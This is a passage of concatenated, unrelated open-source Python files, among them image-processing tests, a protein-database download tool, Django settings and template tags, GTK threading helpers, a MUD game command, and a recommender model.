        return Marshal.load(file.read)
        """ % (f, f))
        assert space.str_w(w_res) == "hallo"

        w_res = space.execute("""
        Marshal.dump('hallo', File.new('%s', 'wb'))
        file = File.open('%s', 'rb')
        return Marshal.load(file)
        """ % (f, f))
        assert space.str_w(w_res) == "hallo"

##########################################################################
#
#  Copyright (c) 2013-2015, Image Engine Design Inc. All rights reserved.
#
#  Redistribution and use in source and binary forms, with or without
#  modification, are permitted provided that the following conditions are
#  met:
#
#      * Redistributions of source code must retain the above
#        copyright notice, this list of conditions and the following
#        disclaimer.
#
#      * Redistributions in binary form must reproduce the above
#        copyright notice, this list of conditions and the following
#        disclaimer in the documentation and/or other materials provided with
#        the distribution.
#
#      * Neither the name of John Haddon nor the names of
#        any other contributors to this software may be used to endorse or
#        promote products derived from this software without specific prior
#        written permission.
#
#  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
#  IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
#  THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
#  PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
#  CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
#  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
#  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
#  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
#  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
#  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################

import os
import unittest

import IECore

import Gaffer
import GafferImage
import GafferImageTest

class ObjectToImageTest( GafferImageTest.ImageTestCase ) :

	fileName = os.path.expandvars( "$GAFFER_ROOT/python/GafferImageTest/images/checker.exr" )
	negFileName = os.path.expandvars( "$GAFFER_ROOT/python/GafferImageTest/images/checkerWithNegativeDataWindow.200x150.exr" )

	def test( self ) :

		i = IECore.Reader.create( self.fileName ).read()

		n = GafferImage.ObjectToImage()
		n["object"].setValue( i )

		self.assertEqual( n["out"].image(), i )

	def testImageWithANegativeDataWindow( self ) :

		i = IECore.Reader.create( self.negFileName ).read()

		n = GafferImage.ObjectToImage()
		n["object"].setValue( i )

		self.assertEqual( n["out"].image(), i )

	def testHashVariesPerTileAndChannel( self ) :

		n = GafferImage.ObjectToImage()
		n["object"].setValue( IECore.Reader.create( self.fileName ).read() )

		self.assertNotEqual(
			n["out"].channelDataHash( "R", IECore.V2i( 0 ) ),
			n["out"].channelDataHash( "G", IECore.V2i( 0 ) )
		)

		self.assertNotEqual(
			n["out"].channelDataHash( "R", IECore.V2i( 0 ) ),
			n["out"].channelDataHash( "R", IECore.V2i( GafferImage.ImagePlug.tileSize() ) )
		)

if __name__ == "__main__":
	unittest.main()

#!/usr/bin/env python2
from __future__ import print_function

import sys
import os
import urllib
import argparse
import xml.etree.ElementTree as ET

def warn(*msgs):
	for x in msgs: print('[WARNING]:', x, file=sys.stderr)

class PDBTM:
	def __init__(self, filename):
		#self.tree = ET.parse(filename)
		#self.root = self.tree.getroot()
		def strsum(l):
			s = ''
			for x in l: s += x.rstrip() + '\n'
			return s
		f = open(filename)
		s = []
		for l in f: s.append(l)
		#s = strsum(s[1:-1]).strip()
		s = strsum(s).strip()

		self.root = ET.fromstring(s)
		print(root)

def get_database(prefix='.'):
	if not prefix.endswith('/'): prefix += '/'
	print('Fetching database...', file=sys.stderr)
	db = urllib.urlopen('http://pdbtm.enzim.hu/data/pdbtmall')
	print('Saving database...', file=sys.stderr)
	f = open('%s/pdbtmall' % prefix, 'w')
	for l in db: f.write(l)
	#f.write(db.read())
	db.close()
	f.close()

def build_database(fn, prefix):
	print('Unpacking database...', file=sys.stderr)
	f = open(fn)
	db = f.read()
	f.close()
	firstline = 1
	header = ''
	entries = []
	pdbids = []
	for l in db.split('\n'):
		if firstline: 
			header += l
			firstline -= 1
			continue
		if 'PDBTM>' in l: continue
		if l.startswith('<?'): continue
		if l.startswith('<pdbtm'):
			a = l.find('ID=') + 4
			b = a + 4
			pdbids.append(l[a:b])
			entries.append(header)
		entries[-1] += '\n' + l
	if not prefix.endswith('/'): prefix += '/'
	if not os.path.isdir(prefix): os.mkdir(prefix)
	for entry in zip(pdbids, entries):
		f = open(prefix + entry[0] + '.xml', 'w')
		f.write(entry[1])
		f.close()
		

if __name__ == '__main__':
	parser = argparse.ArgumentParser(description='Manages PDBTM databases. Automatically fetches the PDBTM database if no options are specified. Run without any arguments, dbtool will retrieve the PDBTM database, store it in pdbtm, and unpack it.')

	parser.add_argument('-d', '--db', default='pdbtmall', help='name of concatenated database file {default:pdbtmall}')
	parser.add_argument('-b', '--build-db', action='store_true', help='(re)build database from an existing pdbtmsall file (available at http://pdbtm.enzim.hu/data/pdbtmall)')
	parser.add_argument('directory', nargs='?', default='pdbtm', help='directory to store database in')
	parser.add_argument('-f', '--force-refresh', action='store_true', help='force overwrite of existing database. Functionally equivalent to removing the old database and rerunning.')
	#parser.add_argument('-n', metavar='bundle_size', type=int, help='size to cut bundles into')

	args = parser.parse_args()

	if args.build_db: build_database(args.db, args.directory)
	else: #db = PDBTM(args.db)
		if not os.path.isdir(args.directory): os.mkdir(args.directory)
		if args.force_refresh or not os.path.isfile('%s/%s' % (args.directory, args.db)): get_database(args.directory)
		build_database('%s/%s' % (args.directory, args.db), args.directory)
		

	#http://pdbtm.enzim.hu/data/pdbtmall

from django.template import Library, Node, resolve_variable, TemplateSyntaxError
from django.core.urlresolvers import reverse

register = Library()
   
@register.simple_tag
def active(request, pattern):
    import re

    if re.search(pattern, request.get_full_path()):
        return 'active'
    return ''
'''
Given a number, find the next higher number using only the digits in the given number. 
For example if the given number is 1234, next higher number with same digits is 1243
'''

def FindNext(num):
    number = str(num)
    length = len(number)
    for i in range(length-2,-1,-1):
        current = number[i]
        right = number[i+1]
        if current < right:
           temp = sorted(number[i:])
           Next = temp[temp.index(current)+1]
           temp.remove(Next)
           temp = ''.join(temp)
           return int(number[:i]+Next+temp)
    return num       

import requests


class Status(object):
    SKIP_LOCALES = ['en_US']

    def __init__(self, url, app=None, highlight=None):
        self.url = url
        self.app = app
        self.highlight = highlight or []

        self.data = []
        self.created = None

    def get_data(self):
        if self.data:
            return

        resp = requests.get(self.url)
        if resp.status_code != 200:
            resp.raise_for_status()

        self.data = resp.json()
        self.created = self.data[-1]['created']

    def summary(self):
        """Generates summary data of today's state"""
        self.get_data()

        highlight = self.highlight
        last_item = self.data[-1]

        output = {}
        output['app'] = self.app or 'ALL'

        data = last_item['locales']

        if self.app:
            get_item = lambda x: x['apps'][self.app]
        else:
            get_item = lambda x: x

        apps = data.items()[0][1]['apps'].keys()
        apps.sort()
        output['apps'] = apps

        items = [item for item in data.items() if item[0] not in highlight]
        hitems = [item for item in data.items() if item[0] in highlight]

        highlighted = []
        if hitems:
            for loc, loc_data in sorted(hitems, key=lambda x: -x[1]['percent']):
                if loc in self.SKIP_LOCALES:
                    continue
                item = get_item(loc_data)
                total = item.get('total', -1)
                translated = item.get('translated', -1)
                percent = item.get('percent', -1)
                untranslated_words = item.get('untranslated_words', -1)

                highlighted.append({
                    'locale': loc,
                    'percent': percent,
                    'total': total,
                    'translated': translated,
                    'untranslated': total - translated,
                    'untranslated_words': untranslated_words
                })
        output['highlighted'] = highlighted

        locales = []
        for loc, loc_data in sorted(items, key=lambda x: -x[1]['percent']):
            if loc in self.SKIP_LOCALES:
                continue
            item = get_item(loc_data)
            total = item.get('total', -1)
            translated = item.get('translated', -1)
            percent = item.get('percent', -1)
            untranslated_words = item.get('untranslated_words', -1)

            locales.append({
                'locale': loc,
                'percent': percent,
                'total': total,
                'translated': translated,
                'untranslated': total - translated,
                'untranslated_words': untranslated_words
            })

        output['locales'] = locales

        output['created'] = self.created

        return output

    def _mark_movement(self, data):
        """For each item, converts to a tuple of (movement, item)"""
        ret = []
        prev_day = None
        for i, day in enumerate(data):
            if i == 0:
                ret.append(('', day))
                prev_day = day
                continue

            if prev_day > day:
                item = ('down', day)
            elif prev_day < day:
                item = ('up', day)
            else:
                item = ('equal', day)

            prev_day = day
            ret.append(item)

        return ret

    def history(self):
        self.get_data()

        data = self.data
        highlight = self.highlight
        app = self.app

        # Get a list of the locales we'll iterate through
        locales = sorted(data[-1]['locales'].keys())

        num_days = 14

        # Truncate the data to what we want to look at
        data = data[-num_days:]

        if app:
            get_data = lambda x: x['apps'][app]['percent']
        else:
            get_data = lambda x: x['percent']

        hlocales = [loc for loc in locales if loc in highlight]
        locales = [loc for loc in locales if loc not in highlight]

        output = {}
        output['app'] = self.app or 'All'

        output['headers'] = [item['created'] for item in data]

        output['highlighted'] = sorted(
            (loc, self._mark_movement(get_data(day['locales'][loc]) for day in data))
            for loc in hlocales
        )

        output['locales'] = sorted(
            (loc, self._mark_movement(get_data(day['locales'].get(loc, {'percent': 0.0})) for day in data))
            for loc in locales
        )

        output['created'] = self.created

        return output

# -*-coding:Utf-8 -*

# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
#   may be used to endorse or promote products derived from this software
#   without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


"""Package contenant la commande 'débarquer'."""

from math import sqrt

from primaires.interpreteur.commande.commande import Commande
from secondaires.navigation.constantes import *

class CmdDebarquer(Commande):

    """Commande 'debarquer'"""

    def __init__(self):
        """Constructeur de la commande"""
        Commande.__init__(self, "debarquer", "debark")
        self.nom_categorie = "navire"
        self.aide_courte = "débarque du navire"
        self.aide_longue = \
            "Cette commande permet de débarquer du navire sur lequel " \
            "on se trouve. On doit se trouver assez prêt d'une côte " \
            "pour débarquer dessus."

    def interpreter(self, personnage, dic_masques):
        """Méthode d'interprétation de commande"""
        salle = personnage.salle
        if not hasattr(salle, "navire") or salle.navire is None:
            personnage << "|err|Vous n'êtes pas sur un navire.|ff|"
            return

        navire = salle.navire
        if navire.etendue is None:
            personnage << "|err|Vous n'êtes pas sur un navire.|ff|"
            return

        personnage.agir("bouger")
        # On va chercher la salle la plus proche
        etendue = navire.etendue

        # On cherche la salle de nagvire la plus proche
        d_salle = None # la salle de destination
        distance = 2
        x, y, z = salle.coords.tuple()
        for t_salle in etendue.cotes.values():
            if t_salle.coords.z == z:
                t_x, t_y, t_z = t_salle.coords.tuple()
                t_distance = sqrt((x - t_x) ** 2 + (y - t_y) ** 2)
                if t_distance < distance and t_salle.nom_terrain in \
                        TERRAINS_ACCOSTABLES:
                    d_salle = t_salle
                    distance = t_distance

        if d_salle is None:
            personnage << "|err|Aucun quai n'a pu être trouvé à " \
                    "proximité.|ff|"
            return

        personnage.salle = d_salle
        personnage << "Vous sautez sur {}.".format(
                d_salle.titre.lower())
        personnage << d_salle.regarder(personnage)
        d_salle.envoyer("{{}} arrive en sautant depuis {}.".format(
                navire.nom), personnage)
        salle.envoyer("{{}} saute sur {}.".format(
                d_salle.titre.lower()), personnage)
        importeur.hook["personnage:deplacer"].executer(
                personnage, d_salle, None, 0)
        if not hasattr(d_salle, "navire") or d_salle.navire is None:
            personnage.envoyer_tip("N'oubliez pas d'amarrer votre navire " \
                    "avec %amarre% %amarre:attacher%.")

#
# GtkMain.py -- pygtk threading help routines.
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke.  All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
"""
GUI threading help routines.

Usage:

   import GtkMain

   # See constructor for GtkMain for options
   self.mygtk = GtkMain.GtkMain()

   # NOT THIS
   #gtk.main()
   # INSTEAD, main thread calls this:
   self.mygtk.mainloop()
   
   # (asynchronous call)
   self.mygtk.gui_do(method, arg1, arg2, ... argN, kwd1=val1, ..., kwdN=valN)

   # OR 
   # (synchronous call)
   res = self.mygtk.gui_call(method, arg1, arg2, ... argN, kwd1=val1, ..., kwdN=valN)

   # To cause the GUI thread to terminate the mainloop
   self.mygtk.qui_quit()
   
   """
import sys, traceback
import thread, threading
import logging
import Queue as que

import gtk
from ginga.misc import Task, Future


class GtkMain(object):

    def __init__(self, queue=None, logger=None, ev_quit=None):
        # You can pass in a queue if you prefer to do so
        if not queue:
            queue = que.Queue()
        self.gui_queue = queue
        # You can pass in a logger if you prefer to do so
        if logger == None:
            logger = logging.getLogger('GtkHelper')
        self.logger = logger
        if not ev_quit:
            ev_quit = threading.Event()
        self.ev_quit = ev_quit
        
        self.gui_thread_id = None
        
    def update_pending(self, timeout=0.0):
        """Process all pending GTK events and return.  _timeout_ is a tuning
        parameter for performance.
        """
        # Process "out-of-band" GTK events
        try:
            while gtk.events_pending():
                #gtk.main_iteration(False)
                gtk.main_iteration()
        finally:
            pass

        done = False
        while not done:
            # Process "in-band" GTK events
            try:
                future = self.gui_queue.get(block=True, 
                                            timeout=timeout)

                # Execute the GUI method
                try:
                    try:
                        res = future.thaw(suppress_exception=False)

                    except Exception, e:
                        future.resolve(e)

                        self.logger.error("gui error: %s" % str(e))
                        try:
                            (type, value, tb) = sys.exc_info()
                            tb_str = "".join(traceback.format_tb(tb))
                            self.logger.error("Traceback:\n%s" % (tb_str))

                        except Exception, e:
                            self.logger.error("Traceback information unavailable.")

                finally:
                    pass

                    
            except que.Empty:
                done = True
                
            except Exception, e:
                self.logger.error("Main GUI loop error: %s" % str(e))
                
        # Process "out-of-band" GTK events again
        try:
            while gtk.events_pending():
                #gtk.main_iteration(False)
                gtk.main_iteration()
        finally:
            pass

    def gui_do(self, method, *args, **kwdargs):
        """General method for asynchronously calling into the GUI.
        It makes a future to call the given (method) with the given (args)
        and (kwdargs) inside the gui thread.  If the calling thread is a
        non-gui thread the future is returned.
        """
        future = Future.Future()
        future.freeze(method, *args, **kwdargs)
        self.gui_queue.put(future)

        my_id = thread.get_ident() 
        if my_id != self.gui_thread_id:
            return future
   
    def gui_call(self, method, *args, **kwdargs):
        """General method for synchronously calling into the GUI.
        This waits until the method has completed before returning.
        """
        my_id = thread.get_ident() 
        if my_id == self.gui_thread_id:
            return method(*args, **kwdargs)
        else:
            future = self.gui_do(method, *args, **kwdargs)
            return future.wait()
   
    def gui_do_future(self, future):
        self.gui_queue.put(future)
        return future

    def nongui_do(self, method, *args, **kwdargs):
        task = Task.FuncTask(method, args, kwdargs, logger=self.logger)
        return self.nongui_do_task(task)
   
    def nongui_do_cb(self, tup, method, *args, **kwdargs):
        task = Task.FuncTask(method, args, kwdargs, logger=self.logger)
        task.register_callback(tup[0], args=tup[1:])
        return self.nongui_do_task(task)
   
    def nongui_do_future(self, future):
        task = Task.FuncTask(future.thaw, (), {}, logger=self.logger)
        return self.nongui_do_task(task)
   
    def nongui_do_task(self, task):
        try:
            task.init_and_start(self)
            return task
        except Exception, e:
            self.logger.error("Error starting task: %s" % (str(e)))
            raise(e)

    def assert_gui_thread(self):
        my_id = thread.get_ident() 
        assert my_id == self.gui_thread_id, \
               Exception("Non-GUI thread (%d) is executing GUI code!" % (
            my_id))
        
    def assert_nongui_thread(self):
        my_id = thread.get_ident() 
        assert my_id != self.gui_thread_id, \
               Exception("GUI thread (%d) is executing non-GUI code!" % (
            my_id))
        
    def mainloop(self, timeout=0.001):
        # Mark our thread id
        self.gui_thread_id = thread.get_ident()

        while not self.ev_quit.isSet():
            self.update_pending(timeout=timeout)

    def gui_quit(self):
        "Call this to cause the GUI thread to quit the mainloop."""
        self.ev_quit.set()
        

# END

# coding: utf-8
# This file is part of Thomas Aquinas.
#
# Thomas Aquinas is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Thomas Aquinas is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Thomas Aquinas.  If not, see <http://www.gnu.org/licenses/>.
#
#                       veni, Sancte Spiritus.

import ctypes
import logging


#<pycode(py_choose)>
class Choose:
  """
  Choose - class for choose() with callbacks
  """
  def __init__(self, list, title, flags=0, deflt=1, icon=37):
    self.list = list
    self.title = title

    self.flags = flags
    self.x0 = -1
    self.x1 = -1
    self.y0 = -1
    self.y1 = -1

    self.width = -1
    self.deflt = deflt
    self.icon = icon

    # HACK: Add a circular reference for non-modal choosers. This prevents the GC
    # from collecting the class object the callbacks need. Unfortunately this means
    # that the class will never be collected, unless refhack is set to None explicitly.
    if (flags & Choose2.CH_MODAL) == 0:
      self.refhack = self

  def sizer(self):
    """
    Callback: sizer - returns the length of the list
    """
    return len(self.list)

  def getl(self, n):
    """
    Callback: getl - get one item from the list
    """
    if n == 0:
       return self.title
    if n <= self.sizer():
      return str(self.list[n-1])
    else:
      return "<Empty>"


  def ins(self):
    pass


  def update(self, n):
    pass


  def edit(self, n):
    pass


  def enter(self, n):
    print "enter(%d) called" % n


  def destroy(self):
    pass


  def get_icon(self, n):
    pass


  def choose(self):
    """
    choose - Display the choose dialogue
    """
    old = set_script_timeout(0)
    n = _idaapi.choose_choose(
        self,
        self.flags,
        self.x0,
        self.y0,
        self.x1,
        self.y1,
        self.width,
        self.deflt,
        self.icon)
    set_script_timeout(old)
    return n
#</pycode(py_choose)>

# -*- coding: utf-8 -*-
'''
Production Configurations

- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use sendgrid to send emails
- Use MEMCACHIER on Heroku
'''
from configurations import values

# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
    from S3 import CallingFormat
    AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
    # TODO: Fix this where even if in Dev this class is called.
    pass

from .common import Common


class Production(Common):

    # This ensures that Django will be able to detect a secure connection
    # properly on Heroku.
    SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')

    # INSTALLED_APPS
    INSTALLED_APPS = Common.INSTALLED_APPS
    # END INSTALLED_APPS

    # SECRET KEY
    SECRET_KEY = values.SecretValue()
    # END SECRET KEY

    # django-secure
    INSTALLED_APPS += ("djangosecure", )

    # set this to 60 seconds and then to 518400 when you can prove it works
    SECURE_HSTS_SECONDS = 60
    SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
    SECURE_FRAME_DENY = values.BooleanValue(True)
    SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
    SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
    SESSION_COOKIE_SECURE = values.BooleanValue(False)
    SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
    SECURE_SSL_REDIRECT = values.BooleanValue(True)
    # end django-secure

    # SITE CONFIGURATION
    # Hosts/domain names that are valid for this site
    # See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
    ALLOWED_HOSTS = ["*"]
    # END SITE CONFIGURATION

    INSTALLED_APPS += ("gunicorn", )

    # STORAGE CONFIGURATION
    # See: http://django-storages.readthedocs.org/en/latest/index.html
    INSTALLED_APPS += (
        'storages',
    )

    # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
    STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'

    # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
    AWS_ACCESS_KEY_ID = values.SecretValue()
    AWS_SECRET_ACCESS_KEY = values.SecretValue()
    AWS_STORAGE_BUCKET_NAME = values.SecretValue()
    AWS_AUTO_CREATE_BUCKET = True
    AWS_QUERYSTRING_AUTH = False

    # see: https://github.com/antonagestam/collectfast
    AWS_PRELOAD_METADATA = True
    INSTALLED_APPS += ('collectfast', )

    # AWS cache settings, don't change unless you know what you're doing:
    AWS_EXPIRY = 60 * 60 * 24 * 7
    AWS_HEADERS = {
        'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (
            AWS_EXPIRY, AWS_EXPIRY)
    }

    # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
    STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
    # END STORAGE CONFIGURATION

    # EMAIL
    DEFAULT_FROM_EMAIL = values.Value('tco2 <noreply@example.com>')
    EMAIL_HOST = values.Value('smtp.sendgrid.com')
    EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="", environ_name="SENDGRID_PASSWORD")
    EMAIL_HOST_USER = values.SecretValue(environ_prefix="", environ_name="SENDGRID_USERNAME")
    EMAIL_PORT = values.IntegerValue(587, environ_prefix="", environ_name="EMAIL_PORT")
    EMAIL_SUBJECT_PREFIX = values.Value('[tco2] ', environ_name="EMAIL_SUBJECT_PREFIX")
    EMAIL_USE_TLS = True
    SERVER_EMAIL = EMAIL_HOST_USER
    # END EMAIL

    # TEMPLATE CONFIGURATION
    # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
    TEMPLATE_LOADERS = (
        ('django.template.loaders.cached.Loader', (
            'django.template.loaders.filesystem.Loader',
            'django.template.loaders.app_directories.Loader',
        )),
    )
    # END TEMPLATE CONFIGURATION

    # CACHING
    # Only do this here because thanks to django-pylibmc-sasl and pylibmc
    # memcacheify is painful to install on windows.
    try:
        # See: https://github.com/rdegges/django-heroku-memcacheify
        from memcacheify import memcacheify
        CACHES = memcacheify()
    except ImportError:
        CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
    # END CACHING

    # Your production stuff: Below this line define 3rd party library settings

# Author: Immanuel Bayer
# License: BSD 3 clause

import ffm
import numpy as np
from .base import FactorizationMachine
from sklearn.utils.testing import assert_array_equal
from .validation import check_array, assert_all_finite


class FMRecommender(FactorizationMachine):

    """ Factorization Machine Recommender with pairwise (BPR) loss solver.

    Parameters
    ----------
    n_iter : int, optional
        The number of interations of individual samples .

    init_stdev: float, optional
        Sets the stdev for the initialization of the parameter

    random_state: int, optional
        The seed of the pseudo random number generator that
        initializes the parameters and mcmc chain.

    rank: int
        The rank of the factorization used for the second order interactions.

    l2_reg_w : float
        L2 penalty weight for pairwise coefficients.

    l2_reg_V : float
        L2 penalty weight for linear coefficients.

    l2_reg : float
        L2 penalty weight for all coefficients (default=0).

    step_size : float
        Stepsize for the SGD solver, the solver uses a fixed step size and
        might require a tunning of the number of iterations `n_iter`.

    Attributes
    ---------

    w0_ : float
        bias term

    w_ : float | array, shape = (n_features)
        Coefficients for linear combination.

    V_ : float | array, shape = (rank_pair, n_features)
        Coefficients of second order factor matrix.
    """

    def __init__(self, n_iter=100, init_stdev=0.1, rank=8, random_state=123,
                 l2_reg_w=0.1, l2_reg_V=0.1, l2_reg=0, step_size=0.1):
        super(FMRecommender, self).\
            __init__(n_iter=n_iter, init_stdev=init_stdev, rank=rank,
                     random_state=random_state)
        if (l2_reg != 0):
            self.l2_reg_V = l2_reg
            self.l2_reg_w = l2_reg
        else:
            self.l2_reg_w = l2_reg_w
            self.l2_reg_V = l2_reg_V
        self.step_size = step_size
        self.task = "ranking"

    def fit(self, X, pairs):
        """ Fit model with specified loss.

        Parameters
        ----------
        X : scipy.sparse.csc_matrix, (n_samples, n_features)

        y : float | ndarray, shape = (n_compares, 2)
                Each row `i` defines a pair of samples such that
                the first returns a high value then the second
                FM(X[i,0]) > FM(X[i, 1]).
        """
        X = X.T
        X = check_array(X, accept_sparse="csc", dtype=np.float64)
        assert_all_finite(pairs)

        pairs = pairs.astype(np.float64)
        # check that pairs contain no real values
        assert_array_equal(pairs, pairs.astype(np.int32))
        assert pairs.max() <= X.shape[1]
        assert pairs.min() >= 0
        self.w0_, self.w_, self.V_ = ffm.ffm_fit_sgd_bpr(self, X, pairs)
        return self

#------------------------------------------------------------------------------
# Copyright (c) 2007, Riverbank Computing Limited
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD license.
# However, when used with the GPL version of PyQt the additional terms described in the PyQt GPL exception also apply

#
# Author: Riverbank Computing Limited
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------


# Standard library imports.
import sys

# Major package imports.
from pyface.qt import QtCore, QtGui

# Enthought library imports.
from traits.api import Bool, Event, provides, Unicode

# Local imports.
from pyface.i_python_editor import IPythonEditor, MPythonEditor
from pyface.key_pressed_event import KeyPressedEvent
from pyface.widget import Widget
from pyface.ui.qt4.code_editor.code_widget import AdvancedCodeWidget


@provides(IPythonEditor)
class PythonEditor(MPythonEditor, Widget):
    """ The toolkit specific implementation of a PythonEditor.  See the
    IPythonEditor interface for the API documentation.
    """


    #### 'IPythonEditor' interface ############################################

    dirty = Bool(False)

    path = Unicode

    show_line_numbers = Bool(True)

    #### Events ####

    changed = Event

    key_pressed = Event(KeyPressedEvent)

    ###########################################################################
    # 'object' interface.
    ###########################################################################

    def __init__(self, parent, **traits):
        super(PythonEditor, self).__init__(**traits)
        self.control = self._create_control(parent)

    ###########################################################################
    # 'PythonEditor' interface.
    ###########################################################################

    def load(self, path=None):
        """ Loads the contents of the editor.
        """
        if path is None:
            path = self.path

        # We will have no path for a new script.
        if len(path) > 0:
            f = open(self.path, 'r')
            text = f.read()
            f.close()
        else:
            text = ''

        self.control.code.setPlainText(text)
        self.dirty = False

    def save(self, path=None):
        """ Saves the contents of the editor.
        """
        if path is None:
            path = self.path

        f = open(path, 'w')
        f.write(self.control.code.toPlainText())
        f.close()

        self.dirty = False

    def select_line(self, lineno):
        """ Selects the specified line.
        """
        self.control.code.set_line_column(lineno, 0)
        self.control.code.moveCursor(QtGui.QTextCursor.EndOfLine,
                                     QtGui.QTextCursor.KeepAnchor)

    ###########################################################################
    # Trait handlers.
    ###########################################################################

    def _path_changed(self):
        self._changed_path()

    def _show_line_numbers_changed(self):
        if self.control is not None:
            self.control.code.line_number_widget.setVisible(
                self.show_line_numbers)
            self.control.code.update_line_number_width()

    ###########################################################################
    # Private interface.
    ###########################################################################

    def _create_control(self, parent):
        """ Creates the toolkit-specific control for the widget.
        """
        self.control = control = AdvancedCodeWidget(parent)
        self._show_line_numbers_changed()

        # Install event filter to trap key presses.
        event_filter = PythonEditorEventFilter(self, self.control)
        self.control.installEventFilter(event_filter)
        self.control.code.installEventFilter(event_filter)

        # Connect signals for text changes.
        control.code.modificationChanged.connect(self._on_dirty_changed)
        control.code.textChanged.connect(self._on_text_changed)

        # Load the editor's contents.
        self.load()

        return control

    def _on_dirty_changed(self, dirty):
        """ Called whenever a change is made to the dirty state of the
            document.
        """
        self.dirty = dirty

    def _on_text_changed(self):
        """ Called whenever a change is made to the text of the document.
        """
        self.changed = True


class PythonEditorEventFilter(QtCore.QObject):
    """ A thin wrapper around the advanced code widget to handle the key_pressed
        Event.
    """

    def __init__(self, editor, parent):
        super(PythonEditorEventFilter, self).__init__(parent)
        self.__editor = editor

    def eventFilter(self, obj, event):
        """ Reimplemented to trap key presses.
        """
        if self.__editor.control and obj == self.__editor.control and \
               event.type() == QtCore.QEvent.FocusOut:
            # Hack for Traits UI compatibility.
            self.__editor.control.emit(QtCore.SIGNAL('lostFocus'))

        elif self.__editor.control and obj == self.__editor.control.code and \
               event.type() == QtCore.QEvent.KeyPress:
            # Pyface doesn't seem to be Unicode aware.  Only keep the key code
            # if it corresponds to a single Latin1 character.
            kstr = event.text()
            try:
                kcode = ord(str(kstr))
            except:
                kcode = 0

            mods = event.modifiers()
            self.key_pressed = KeyPressedEvent(
                alt_down     = ((mods & QtCore.Qt.AltModifier) ==
                                QtCore.Qt.AltModifier),
                control_down = ((mods & QtCore.Qt.ControlModifier) ==
                                QtCore.Qt.ControlModifier),
                shift_down   = ((mods & QtCore.Qt.ShiftModifier) ==
                                QtCore.Qt.ShiftModifier),
                key_code     = kcode,
                event        = event)

        return super(PythonEditorEventFilter, self).eventFilter(obj, event)

import argparse
import glob
import hashlib
import json
import os


IRMAS_INDEX_PATH = '../mirdata/indexes/irmas_index.json'


def md5(file_path):
    """Get md5 hash of a file.
    Parameters
    ----------
    file_path: str
        File path.
    Returns
    -------
    md5_hash: str
        md5 hash of data in file_path
    """
    hash_md5 = hashlib.md5()
